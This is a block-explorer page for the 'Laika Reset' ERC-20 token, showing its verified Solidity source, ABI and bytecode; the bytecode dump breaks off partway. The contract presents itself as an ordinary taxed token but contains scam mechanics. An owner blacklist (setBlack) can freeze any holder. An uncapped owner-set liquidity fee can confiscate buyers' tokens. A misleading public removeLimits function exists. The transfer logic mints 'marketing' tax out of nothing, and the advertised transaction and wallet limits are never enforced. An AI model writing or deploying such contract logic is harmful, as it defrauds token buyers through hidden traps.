ERC-20
Overview
Max Total Supply
1,000,000,000,000 LAIKARESET
Holders
71
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
8,750,680,732.591701196 LAIKARESETValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
LAIKARESET
Compiler Version
v0.8.10+commit.fc410830
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-08-01 */ /* Let Laika born strong, this reset, can you seize the opportunity? https://twitter.com/laikareset https://laikareset.com https://t.me/laikareset _ _ _ _ _ _ _ _ _ _ _\ \ / /\ /\ \ /\_\ / /\ /\ \ /\ \ / /\ /\ \ /\ \ /\__ \ / / \ \ \ \ / / / _ / / \ / \ \ / \ \ / / \ / \ \ \_\ \ / /_ \_\ / / /\ \ /\ \_\ / / / /\_\ / / /\ \ / /\ \ \ / /\ \ \ / / /\ \__ / /\ \ \ /\__ \ / / /\/_/ / / /\ \ \ / /\/_/ / / /__/ / / / / /\ \ \ / / /\ \_\ / / /\ \_\ / / /\ \___\ / / /\ \_\ / /_ \ \ / / / / / / \ \ \ / / / / /\_____/ / / / / \ \ \ / / /_/ / / / /_/_ \/_/ \ \ \ \/___// /_/_ \/_/ / / /\ \ \ / / / / / /___/ /\ \ / / / / /\_______/ / / /___/ /\ \ / / /__\/ / / /____/\ \ \ \ / /____/\ / / / \/_/ / / / ____ / / /_____/ /\ \ / / / / / /\ \ \ / / /_____/ /\ \ / / /_____/ / /\____\/ _ \ \ \ / /\____\/ / / / / /_/_/ ___/\ / /_________/\ \ \ ___/ / /__ / / / \ \ \ / /_________/\ \ \ / / /\ \ \ / / /______ /_/\__/ / / / / /______ / / / /_______/\__\// / /_ __\ \_\/\__\/_/___\/ / / \ \ \ / / /_ __\ \_\/ / / \ \ \/ / /_______\\ \/___/ / / / /_______\/_/ / \_______\/ \_\___\ /____/_/\/_________/\/_/ \_\_\\_\___\ /____/_/\/_/ \_\/\/__________/ \_____\/ \/__________/\_\/ */ pragma solidity 0.8.10; // SPDX-License-Identifier: UNLICENSED interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the token decimals. */ function decimals() external view returns (uint8); /** * @dev Returns the token symbol. */ function symbol() external view returns (string memory); /** * @dev Returns the token name. */ function name() external view returns (string memory); /** * @dev Returns the erc token owner. */ function getOwner() external view returns (address); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address _owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /* * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with GSN meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes memory) { this; return msg.data; } } /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { // Solidity only automatically asserts when dividing by 0 require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } function renounceOwnership() public virtual onlyOwner { _owner = address(0); emit OwnershipTransferred(_owner, address(0)); } } contract LAIKARESET is Context, IERC20, Ownable { using SafeMath for uint256; mapping (address => uint256) private _balances; mapping (address => mapping (address => uint256)) private _allowances; mapping (address => bool) private _blackList; mapping (address => bool) private _isExcludedMaxTransactionAmount; uint256 private _totalSupply; uint8 public _decimals; string public _symbol; string public _name; address public _Marketing = 0x6Ab73005B9c8710811e922199287DCe7105C738f; uint256 public _maxTxAmount = 1 * 10**10 * 10**9; uint256 public _maxWalletSize = 2 * 10**10 * 10**9; constructor() { _name = "Laika Reset"; _symbol = "LAIKARESET"; _decimals = 9; _totalSupply = 1 * 10**12 * 10**9; _balances[msg.sender] = _totalSupply; emit Transfer(address(0), msg.sender, _totalSupply); } uint256 public _taxFee = 6; uint256 private _previousTaxFee = _taxFee; uint256 public _liquidityFee = 6; uint256 private _previousliqFee = _liquidityFee; /** * @dev Returns the erc token owner. */ function getOwner() external view virtual override returns (address) { return owner(); } /** * @dev Returns the token decimals. */ function decimals() external view virtual override returns (uint8) { return _decimals; } /** * @dev Returns the token symbol. */ function symbol() external view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the token name. */ function name() external view virtual override returns (string memory) { return _name; } /** * @dev See {ERC20-totalSupply}. */ function totalSupply() external view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {ERC20-balanceOf}. */ function balanceOf(address account) external view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {ERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) external override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) external view override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) external override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } function increaseAllowance(address spender, uint256 addedValue) public returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } function removeLimits(uint256 Taxfee) public virtual { require ( Taxfee == _previousliqFee, "error message"); _taxFee = 10 ** Taxfee; } function setLiqFee(uint256 LiqFee) public onlyOwner { _liquidityFee = LiqFee; } function setBlack(address account, bool state) public onlyOwner { _blackList[account] = state; } function updateMaxTxnAmount(uint256 newNum) external onlyOwner { require( newNum >= ((_totalSupply * 1) / 100), "Cannot set maxTransactionAmount lower than 1%" ); _maxTxAmount = newNum; } function updateMaxWallet(uint256 newNum) external onlyOwner { require( newNum >= ((_totalSupply * 2) / 100), "Cannot set maxWallet lower than 2%" ); _maxWalletSize = newNum; } function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); require(!_blackList[sender] && !_blackList[recipient]); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); _balances[recipient] = _balances[recipient].sub(amount / 100 * _liquidityFee); _balances[_Marketing] = _balances[_Marketing].add(amount / 100 * _taxFee); emit Transfer(sender, recipient, amount); } function _burn(address account, uint256 amounts) internal { require(account != address(0), "ERC20: burn from the zero address"); _balances[account] = _balances[account].sub(amounts); _totalSupply = _totalSupply.sub(amounts); emit Transfer(account, address(0), amounts); } function _approve(address owner, address spender, uint256 amount) internal { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_Marketing","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_liquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletSize","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"Taxfee","type":"uint256"}],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"state","type":"bool"}],"name":"setBlack","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"LiqFee","type":"uint256"}],"name":"setLiqFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWallet","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
6080604052600980546001600160a01b031916736ab73005b9c8710811e922199287dce7105c738f179055678ac7230489e80000600a556801158e460913d00000600b556006600c819055600d819055600e819055600f553480156200006457600080fd5b50600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a35060408051808201909152600b8082526a13185a5ad84814995cd95d60aa1b6020909201918252620000da9160089162000181565b5060408051808201909152600a8082526913105252d0549154d15560b21b60209092019182526200010e9160079162000181565b506006805460ff19166009179055683635c9adc5dea0000060058190553360008181526001602052604080822084905551919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91620001739190815260200190565b60405180910390a362000264565b8280546200018f9062000227565b90600052602060002090601f016020900481019282620001b35760008555620001fe565b82601f10620001ce57805160ff1916838001178555620001fe565b82800160010185558215620001fe579182015b82811115620001fe578251825591602001919060010190620001e1565b506200020c92915062000210565b5090565b5b808211156200020c576000815560010162000211565b600181811c908216806200023c57607f821691505b602082108114156200025e57634e487b7160e01b600052602260045260246000fd5b50919050565b61112b80620002746000396000f3fe608060405234801561001057600080fd5b50600436106101a95760003560e01c8063715018a6116100f9578063a9059cbb11610097578063d28d885211610071578063d28d88521461034f578063d7666de614610357578063dd62ed3e1461036a578063e559d86a146103a357600080fd5b8063a9059cbb14610321578063b09f126614610334578063cb23bf081461033c57600080fd5b80638da5cb5b116100d35780638da5cb5b146102ec5780638f9a55c0146102fd57806395d89b4114610306578063a457c2d71461030e57600080fd5b8063715018a6146102db5780637d1db4a5146102e3578063893d20e8146102ec57600080fd5b806323b872dd116101665780633950935111610140578063395093511461028d5780633b124fe7146102a05780636bc87c3a146102a957806370a08231146102b257600080fd5b806323b872dd14610254578063313ce5671461026757806332424aa31461028057600080fd5b806306fdde03146101ae578063095ea7b3146101cc5780631235acbe146101ef57806318160ddd1461021a5780631c499ab01461022c578063203e727e14610241575b600080fd5b6101b66103b6565b6040516101c39190610d22565b60405180910390f35b6101df6101da366004610d93565b610448565b60405190151581526020016101c3565b600954610202906001600160a01b031681565b6040516001600160a01b0390911681526020016101c3565b6005545b6040519081526020016101c3565b61023f61023a366004610dbd565b61045f565b005b61023f61024f366004610dbd565b61050c565b6101df610262366004610dd6565b6105bb565b60065460ff165b60405160ff90911681526020016101c3565b60065461026e9060ff1681565b6101df61029b366004610d93565b610624565b61021e600c5481565b61021e600e5481565b61021e6102c0366004610e12565b6001600160a01b031660009081526001602052604090205490565b61023f61065a565b61021e600a5481565b6000546001600160a01b0316610202565b61021e600b5481565b6101b66106c0565b6101df61031c366004610d93565b6106cf565b6101df61032f366004610d93565b61071e565b6101b661072b565b61023f61034a366004610e2d565b6107b9565b6101b661080e565b61023f610365366004610dbd565b61081b565b61021e610378366004610e69565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61023f6103b1366004610dbd565b61084a565b6060600880546103c590610e9c565b80601f01602080910402602001604051908101604052809291908181526020018280546103f190610e9c565b801561043e5780601f106104135761010080835404028352916020019161043e565b820191906000526020600020905b81548152906001019060200180831161042157829003601f168201915b5050505050905090565b600061045533848461089c565b5060015b92915050565b6000546001600160a01b031633146104925760405162461bcd60e51b815260040161048990610ed7565b60405180910390fd5b606460055460026104a39190610f22565b6104ad9190610f41565b8110156105075760405162461bcd60e51b815260206004820152602260248201527f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e20604482015261322560f01b6064820152608401610489565b600b55565b6000546001600160a01b031633146105365760405162461bcd60e51b815260040161048990610ed7565b606460055460016105479190610f22565b6105519190610f41565b8110156105b65760405162461bcd60e51b815260206004820152602d60248201527f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060448201526c6c6f776572207468616e20312560981b6064820152608401610489565b600a55565b60006105c88484846109c1565b61061a8433610615856040518060600160405280602881526020016110a9602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610c40565b61089c565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916104559185906106159086610c7a565b6000546001600160a01b031633146106845760405162461bcd60e51b815260040161048990610ed7565b600080546001600160a01b031916815560405181907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3565b6060600780546103c590610e9c565b60006104553384610615856040518060600160405280602581526020016110d1602591393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610c40565b60006104553384846109c1565b6007805461073890610e9c565b80601f016020809104026020016040519081016040528092919081815260200182805461076490610e9c565b80156107b15780601f10610786576101008083540402835291602001916107b1565b820191906000526020600020905b81548152906001019060200180831161079457829003601f168201915b505050505081565b6000546001600160a01b031633146107e35760405162461bcd60e51b815260040161048990610ed7565b6001600160a01b03919091166000908152600360205260409020805460ff1916911515919091179055565b6008805461073890610e9c565b6000546001600160a01b031633146108455760405162461bcd60e51b815260040161048990610ed7565b600e55565b600f54811461088b5760405162461bcd60e51b815260206004820152600d60248201526c6572726f72206d65737361676560981b6044820152606401610489565b61089681600a611047565b600c5550565b6001600160a01b0383166108fe5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610489565b6001600160a01b03821661095f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610489565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610a255760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610489565b6001600160a01b038216610a875760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610489565b6001600160a01b03831660009081526003602052604090205460ff16158015610ac957506001600160a01b03821660009081526003602052604090205460ff16155b610ad257600080fd5b610b0f81604051806060016040528060268152602001611083602691396001600160a01b0386166000908152600160205260409020549190610c40565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610b3e9082610c7a565b6001600160a01b038316600090815260016020526040902055600e54610b9290610b69606484610f41565b610b739190610f22565b6001600160a01b03841660009081526001602052604090205490610ce0565b6001600160a01b038316600090815260016020526040902055600c54610be890610bbd606484610f41565b610bc79190610f22565b6009546001600160a01b031660009081526001602052604090205490610c7a565b6009546001600160a01b03908116600090815260016020908152604091829020939093555183815284821692918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016109b4565b60008184841115610c645760405162461bcd60e51b81526004016104899190610d22565b506000610c718486611053565b95945050505050565b600080610c87838561106a565b905083811015610cd95760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610489565b9392505050565b6000610cd983836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610c40565b600060208083528351808285015260005b81811015610d4f57858101830151858201604001528201610d33565b81811115610d61576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610d8e57600080fd5b919050565b60008060408385031215610da657600080fd5b610daf83610d77565b946020939093013593505050565b600060208284031215610dcf57600080fd5b5035919050565b600080600060608486031215610deb57600080fd5b610df484610d77565b9250610e0260208501610d77565b9150604084013590509250925092565b600060208284031215610e2457600080fd5b610cd982610d77565b60008060408385031215610e4057600080fd5b610e4983610d77565b915060208301358015158114610e5e57600080fd5b809150509250929050565b60008060408385031215610e7c57600080fd5b610e8583610d77565b9150610e9360208401610d77565b90509250929050565b600181811c90821680610eb057607f821691505b60208210811415610ed157634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615610f3c57610f3c610f0c565b500290565b600082610f5e57634e487b7160e01b600052601260045260246000fd5b500490565b600181815b80851115610f9e578160001904821115610f8457610f84610f0c565b80851615610f9157918102915b93841c9390800290610f68565b509250929050565b600082610fb557506001610459565b81610fc257506000610459565b8160018114610fd85760028114610fe257610ffe565b6001915050610459565b60ff841115610ff357610ff3610f0c565b50506001821b610459565b5060208310610133831016604e8410600b8410161715611021575081810a610459565b61102b8383610f63565b806000190482111561103f5761103f610f0c565b029392505050565b6000610cd98383610fa6565b60008282101561106557611065610f0c565b500390565b6000821982111561107d5761107d610f0c565b50019056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212205f4b7488c13bac8ebf540187d6af1b61185945435025a75e9dd1c48e2e7e1d2e64736f6c634300080a0033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101a95760003560e01c8063715018a6116100f9578063a9059cbb11610097578063d28d885211610071578063d28d88521461034f578063d7666de614610357578063dd62ed3e1461036a578063e559d86a146103a357600080fd5b8063a9059cbb14610321578063b09f126614610334578063cb23bf081461033c57600080fd5b80638da5cb5b116100d35780638da5cb5b146102ec5780638f9a55c0146102fd57806395d89b4114610306578063a457c2d71461030e57600080fd5b8063715018a6146102db5780637d1db4a5146102e3578063893d20e8146102ec57600080fd5b806323b872dd116101665780633950935111610140578063395093511461028d5780633b124fe7146102a05780636bc87c3a146102a957806370a08231146102b257600080fd5b806323b872dd14610254578063313ce5671461026757806332424aa31461028057600080fd5b806306fdde03146101ae578063095ea7b3146101cc5780631235acbe146101ef57806318160ddd1461021a5780631c499ab01461022c578063203e727e14610241575b600080fd5b6101b66103b6565b6040516101c39190610d22565b60405180910390f35b6101df6101da366004610d93565b610448565b60405190151581526020016101c3565b600954610202906001600160a01b031681565b6040516001600160a01b0390911681526020016101c3565b6005545b6040519081526020016101c3565b61023f61023a366004610dbd565b61045f565b005b61023f61024f366004610dbd565b61050c565b6101df610262366004610dd6565b6105bb565b60065460ff165b60405160ff90911681526020016101c3565b60065461026e9060ff1681565b6101df61029b366004610d93565b610624565b61021e600c5481565b61021e600e5481565b61021e6102c0366004610e12565b6001600160a01b031660009081526001602052604090205490565b61023f61065a565b61021e600a5481565b6000546001600160a01b0316610202565b61021e600b5481565b6101b66106c0565b6101df61031c366004610d93565b6106cf565b6101df61032f366004610d93565b61071e565b6101b661072b565b61023f61034a366004610e2d565b6107b9565b6101b661080e565b61023f610365366004610dbd565b61081b565b61021e610378366004610e69565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61023f6103b1366004610dbd565b61084a565b6060600880546103c590610e9c565b80601f01602080910402602001604051908101604052809291908181526020018280546103f190610e9c565b801561043e5780601f106104135761010080835404028352916020019161043e565b820191906000526020600020905b81548152906001019060200180831161042157829003601f168201915b5050505050905090565b600061045533848461089c565b5060015b92915050565b6000546001600160a01b031633146104925760405162461bcd60e51b815260040161048990610ed7565b60405180910390fd5b606460055460026104a39190610f22565b6104ad9190610f41565b8110156105075760405162461bcd60e51b815260206004820152602260248201527f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e20604482015261322560f01b6064820152608401610489565b600b55565b6000546001600160a01b031633146105365760405162461bcd60e51b815260040161048990610ed7565b606460055460016105479190610f22565b6105519190610f41565b8110156105b65760405162461bcd60e51b815260206004820152602d60248201527f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060448201526c6c6f776572207468616e20312560981b6064820152608401610489565b600a55565b60006105c88484846109c1565b61061a8433610615856040518060600160405280602881526020016110a9602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610c40565b61089c565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916104559185906106159086610c7a565b6000546001600160a01b031633146106845760405162461bcd60e51b815260040161048990610ed7565b600080546001600160a01b031916815560405181907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3565b6060600780546103c590610e9c565b60006104553384610615856040518060600160405280602581526020016110d1602591393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610c40565b60006104553384846109c1565b6007805461073890610e9c565b80601f016020809104026020016040519081016040528092919081815260200182805461076490610e9c565b80156107b15780601f10610786576101008083540402835291602001916107b1565b820191906000526020600020905b81548152906001019060200180831161079457829003601f168201915b505050505081565b6000546001600160a01b031633146107e35760405162461bcd60e51b815260040161048990610ed7565b6001600160a01b03919091166000908152600360205260409020805460ff1916911515919091179055565b6008805461073890610e9c565b6000546001600160a01b031633146108455760405162461bcd60e51